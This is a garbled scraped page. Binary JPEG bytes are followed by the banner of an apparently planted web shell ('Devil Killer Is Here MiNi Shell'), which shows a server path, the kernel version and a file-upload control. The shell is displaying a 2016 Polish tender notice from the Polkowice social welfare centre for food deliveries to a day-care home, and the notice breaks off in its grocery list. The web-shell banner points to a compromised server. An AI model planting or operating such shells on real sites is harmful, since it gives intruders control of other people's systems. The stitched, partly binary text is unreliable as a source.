JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160510/115960-N-2016.html

<p class="kh_header"><b>Polkowice: Dostawa artykułów żywnościowych do Domu Dziennego Pobytu  
w  Ośrodka Pomocy Społecznej 
w Polkowicach</b><br>
<b>Numer ogłoszenia: 115960 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Lipowa 2, 59-100 Polkowice, woj. dolnośląskie, tel. 76 7246700, 7246704, faks 76 7246703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ops.polkowice.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Domu Dziennego Pobytu  
w  Ośrodka Pomocy Społecznej 
w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych w ramach Dostawa artykułów żywnościowych do Domu Dziennego Pobytu w  Ośrodka Pomocy Społecznej w Polkowicach Dostarczany przedmiot dostawy musi odpowiadać wymogom określonym przez rozporządzenie (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. U. L 139 z 30.04.2004, str. 1 - 54; Polskie wydanie specjalne Rozdział 13, Tom 34, str. 319), jak również ustawę z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz. U. z 2010 r. Nr 136, poz. 914) oraz przez inne akty prawne z zakresu prawa żywnościowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy oraz nie podlegają wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać wykonanie, a gdy dostawy mają charakter ciągły lub okresowy i nie zostały zrealizowane, aktualne wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności przez wykonawcę jest krótszy, to w tym okresie, co najmniej dwóch dostaw realizowanych na podstawie dwóch odrębnych umów i mających za przedmiot artykuły żywnościowe dostarczane na potrzeby stołówek szkolnych, przedszkoli lub innych zakładów zbiorowego żywienia z podaniem ich wartości, przedmiotu, dat wykonania oraz załączyć dokumenty (np. referencje), że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a.	Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty 
przez pełnomocnika; 
b.	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika; 
c.	W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty, tj.: oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy, 
oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp oraz dokument wymieniony w punkcie 1.1 lit. b muszą być złożone przez każdy podmiot; 
d.	Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki; 
e.	Oświadczenia wykonawcy zgodnie z załącznikiem nr 3 Formularza ofertowego 
f.	W przypadku osób fizycznych zaleca się złożenie zaświadczenia o wpisie 
do ewidencji działalności gospodarczej zawierające wskazanie prowadzonej działalności gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a. Dopuszcza się zmianę przedstawicieli stron z przyczyn niezależnych od stron (siły wyższe, zdarzenia losowe itp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ops.polkowice.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.ops.polkowice.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2016 godzina 11:00, miejsce: Ośrodek Pomocy Społecznej w Polkowicach u. Lipowa 2, pok. 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.12.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> OWOCE, WARZYWA, PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cebula biała pakowana w workach po 1 kg  nie nadmarznięta, 
bez uszkodzeń mechanicznych	-kg	10
2	Czosnek dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych pakowany na sztuki- 1	kg	
3	Jabłka dojrzałe, nienadmarznięte, bez uszkodzeń mechanicznych	-10kg	
4	Marchew pakowana  w  workach po 2 kg dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	-10kg	
5	Mandarynka dojrzała, nie nadmarznięta, bez uszkodzeń 
mechanicznych	-10kg	
6	Ogórek kwaszony pakowany 700g	-6kg	
7	Ogórek zielony dojrzały, nienadmarznięty, bez uszkodzeń 
mechanicznych	-5kg	
8	Papryka, nienadmarznięta, bez uszkodzeń mechanicznych	-6kg	
9	Pieczarki dojrzałe, nienadmarznięte, bez uszkodzeń 
mechanicznych	-7kg	
10	Pietruszka korzeń pakowana w workach po 1 kg dojrzały, nienadmarznięta, bez uszkodzeń mechanicznych	-5kg	
11	Pietruszka natka, pęczek świeża	-10szt.	
12	Pomidor dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych pakowany po 1kg	-10kg	
13	Seler korzeń pakowany workach po 1kg dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	-5kg	
15	Ziemniaki pakowane  po 5kg dojrzałe, nienadmarznięty, bez uszkodzeń mechanicznych	-30kg	
17	Szczypior dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych pakowany w pęczki		-10szt.
18	Sałata, nienadmarznięta, bez uszkodzeń mechanicznych		-10szt.
19	Sałata lodowa, nienadmarznięta, bez uszkodzeń mechanicznych	-10szt.	
20	Rzodkiewka, nienadmarznięta, bez uszkodzeń mechanicznych pakowana w pęczki	-30szt.	
22	Cytryna dojrzała, nie nadmarznięta, bez uszkodzeń mechanicznych pakowana po 1kg	-4kg	
23	Ananas dojrzały w sezonie, nienadmarznięty, bez uszkodzeń mechanicznych	-5szt.	
24	Arbuz dojrzały w sezonie , nienadmarznięty, bez uszkodzeń mechanicznych	-20kg	
25	Banan dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	-30kg	
26	Cukinia, nienadmarznięta, bez uszkodzeń mechanicznych	-5kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> JAJKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jajka klasy L, wyraźnie oznakowany termin przydatności do spożycia, specyfikacja pochodzenia, atest, świeże, dobrej 
jakości	-200szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE PRODUKTY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	bułka słodka z nadzieniem (ser, owoce. budyń)	-60szt.	
2.	Chleb zwykły pszenno -żytni krojony 500g,mąka pszenna typ 750,mąka żytnia typ 780,pakowany  w folie, świeży.	-130szt.	
3.	Pączki z marmoladą 100g	-60szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GOTOWE PRODUKTY MĄCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Krokiety z kapustą i pieczarkami  (wyrób garmażeryjny, nie mrożony,  gotowy do spożycia)	-9kg	
2.	Uszka z grzybami  (wyrób garmażeryjny, nie mrożony,  gotowy do spożycia)	-6kg	
3.	paszteciki z kapustą mięsem (wyrób garmażeryjny, nie mrożony, gotowy do spożycia)	-6kg	
4.	Pierogi z kapustą i grzybami (wyrób garmażeryjny, nie mrożony gotowy do spożycia)	-5kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko 2% , dobrej jakości, wyraźnie podany termin 
przydatności do spożycia  bez dodatku cukru i substancji słodzących	-25l	
2.	Śmietana 18%  400 g,  wyraźnie oznakowany termin przydatności do spożycia,
zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez  uszkodzeń mechanicznych	-12szt.	
3.	Masło śmietankowe powstałe ze śmietany  200 g, dobrej jakości,
min 82% tłuszczu zwierzęcego, wyraźnie oznakowany okres przydatności do spożycia.	-10szt.	
4.	Ser żółty w plastrach  (salami ,gouda, edamski )  wyraźnie 
oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez  uszkodzeń mechanicznych		-10kg
5.	Serek typu feta ( kanapkowo sałatkowy chudy)  op. 270  g ,  
wyraźnie oznakowany termin przydatności do spożycia,
zawierające nie więcej niż 10 g cukrów w 100ml produktu 
gotowego do spożycia, bez dodatku substancji słodzących 
zdefiniowanych w rozporządzeniu (WE) nr 1333/2008,bez uszkodzeń mechanicznych.	-10szt.	
6.	Jogurt naturalny op. 350-370g , wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia,bez  uszkodzeń mechanicznych.
	-20szt.
7.	Twaróg krajanka  półtłusty bloki  na kg,  wyraźnie oznakowany termin przydatności do spożycia,
zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez  uszkodzeń mechanicznych	-10kg	
8.	Śmietana 30% op. karton 250 g,  wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia,bez  uszkodzeń mechanicznych.	-10szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO, PRODUKTY MIĘSNE, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kiełbasa śląska, zawierający min 70% mięsa w 100g produktu gotowego do spożycia, świeży o właściwych cechach organoleptycznych.	-30kg	
2.	Kości wieprzowe naturalnie wędzone,  świeże o właściwych cechach organoleptycznych. 	-10kg	
3.	Łopatka świeża wp. bez kości, świeży o właściwych cechach organoleptycznych.	-12kg	
4.	Szynka konserwowa prasowana wieprzowa, świeża, zawierająca min 70% mięsa  w 100g  produktu gotowego do spożycia, o właściwych cechach organoleptycznych.	-5kg	
5.	Szynka delikatesowa z kurcząt zawartość piersi z kurczaka 80%, w 100g produktu gotowego do spożycia, o właściwych cechach organoleptycznych.	-5kg	
6.	Udka z kurczaka, świeże, zawierający min 70% mięsa  w 100g produktu gotowego do spożycia, świeży o właściwych cechach organoleptycznych.		-15kg
7.	Filet z kurczaka świeży ,zawierający min 70% mięsa w 100g produktu gotowego do spożycia, o właściwych cechach organoleptycznych, świeży, bez kostki.		-10kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Majonez 700ml, 80g tł. 		-20szt.
2	Kawa Mielona 500g 	-70szt.	
3	Kawa rozpuszczalna 200g 	-30szt.	
4	Ciastka opak. Od 2 do 4 kg kruche przekładane dżemem masą orzechową, masą owocową, galaretką, karmelem ,czekoladą, 		-50kg
5	Ciastka kruche bez czekolady 160g		-40szt.
6	Wafle,  przekładane różne smaki, galaretka lub polewa	-20kg	
7	pierniki w glazurze z nadzieniem owocowym 2,5kg	-2szt.	
8	biszkopty z galaretką w polewie czekoladowej 	-4kg	
9	paluszki solone 200g	-6szt.	
10	Ananas w syropie op. 565 g bez śladów uszkodzeń mechanicznych, spożycia, wyraźnie podany termin przydatności do spożycia	-6szt.	
11	Brzoskwinie w syropie op. 850 g ,bez śladów uszkodzeń mechanicznych, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli	-6szt.	
12	Cukier puder , bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-1kg	
13	Cukier op. 1 kg, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.		-60szt.
14	Czekolada pełno mleczna, oraz gorzka bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli		-60szt.
15	Galaretki rozpuszczalne bez cukru op.  różne smaki bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli		-20szt.
16	Groszek konserwowy op. 400 g ,bez śladów uszkodzeń mechanicznych, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli	-18szt.	
17	Herbata czarna ekspresowa op. 100 saszetek, bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-20szt.	
18	Herbata owocowo- ziołowa z suszu ziołowych i owocowych , smaki : dzika róża i jabłko, malina, jagoda, żurawina, truskawka, cytryna, mięta , lipa, rumianek , koper, melisa, bez śladów uszkodzeń mechanicznych	-20szt.	
19	Ketchup pomidorowy łagodny z zawartością pomidorów min.63% op. 450 g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia,	-20szt.	
20	Koncentrat pomidorowy op. 80g zawartości ekstraktu nie mniej niż 32% bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia,	-10szt.	
21	Kukurydza konserwowa op. 400 g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu		-20szt.
